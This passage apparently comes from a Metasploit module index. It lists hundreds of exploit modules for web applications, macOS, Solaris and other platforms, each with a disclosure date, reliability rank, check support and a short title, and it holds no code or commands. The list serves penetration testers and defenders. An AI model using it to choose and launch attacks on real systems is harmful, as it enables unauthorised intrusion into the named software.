multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution - multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload - multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload - multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) - multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection - multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability - multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution - multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability - multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) - multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution - multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability - multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution - multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution - multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload - multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload - multi/http/cmsms_showtime2_rce 2019-03-11 normal Yes CMS Made Simple (CMSMS) Showtime2 File Upload RCE - multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy - multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload - multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass - multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) - multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability - multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection - multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection - multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection - multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload - multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability - multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution - multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution - multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution - multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 - multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 - multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 - multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution - multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability - multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution - multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution - multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability - multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution - multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution - multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution - multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution - multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection - multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution - multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution - multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution - multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment - multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment - multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) - multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute - multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute - multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE - multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution - multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability - multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection - multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution - multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution - multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability - multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution - multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection - multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution - multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE - multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection - multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload - multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload - multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection - multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution - multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability - multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability - multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution - multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value - multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution - multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload - multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability - multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload - multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution - multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution - multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution - multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution - multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution - multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution - multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability - multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload - multi/http/nuuo_nvrmini_upgrade_rce 2018-08-04 excellent Yes NUUO NVRmini upgrade_handle.php Remote Command Execution - multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution - multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution - multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass - multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution - multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution - multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload - multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload - multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution - multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE - multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution - multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution - multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability - multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution - multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection - multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution - multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability - multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution - multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection - multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection - multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution - multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor - multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() - multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection - multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection - multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution - multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution - multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution - multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution - multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit - multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability - multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution - multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload - multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability - multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution - multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution - multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML Deserialization Code Execution - multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution - multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution - multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution - multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution - multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability - multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution - multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution - multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution - multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass - multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload - multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection - multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution - multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution - multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution - multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution - multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution - multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection - multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection - multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE - multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution - multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution - multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution - multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution - multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution - multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution - multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution - multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution - multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution - multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution - multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution - multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow - multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload - multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload - multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability - multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass - multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution - multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution - multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution - multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution - multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload - multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload - multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution - multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection - multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution - multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution - multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution - multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE - multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution - multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload - multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload - multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload - multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution - multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection - multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload - multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload - multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution - multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution - multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution - multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload - multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution - multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE - multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow - multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation - multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation - multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID privilege escalation - multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution - multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution - multi/misc/bmc_patrol_cmd_exec 2019-01-17 excellent No BMC Patrol Agent Privilege Escalation Cmd Execution - multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution - multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE - multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec - multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API - multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE - multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution - multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution - multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution - multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution - multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution - multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution - multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution - multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution - multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution - multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection - multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution - multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution - multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution - multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution - multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection - multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution - multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution - multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution - multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution - multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE - multi/misc/weblogic_deserialize_rawobject 2015-01-28 excellent No Oracle Weblogic Server Deserialization RCE - Raw Object - multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow - multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) - multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution - multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution - multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow - multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) - multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection - multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution - multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow - multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow - multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution - multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution - multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution - multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution - multi/script/web_delivery 2013-07-19 manual No Script Web Delivery - multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution - multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve - multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution - multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution - multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow - multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution - netware/smb/lsass_cifs 2007-01-21 average No Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow - netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow - osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow - osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) - osx/browser/adobe_flash_delete_range_tl_op 2016-04-27 great No Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion - osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free - osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution - osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution - osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion - osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack - osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack - osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution - osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution - osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow - osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow - osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation - osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation - osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation - osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit - osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer - osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation - osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation - osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation - osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation - osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation - osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation - osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass - osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation - osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) - osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow - osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow - osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) - qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation - qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow - solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation - solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation - solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation - solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution - solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) - solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow - solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution - solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution - solaris/telnet/fuser 2007-02-12 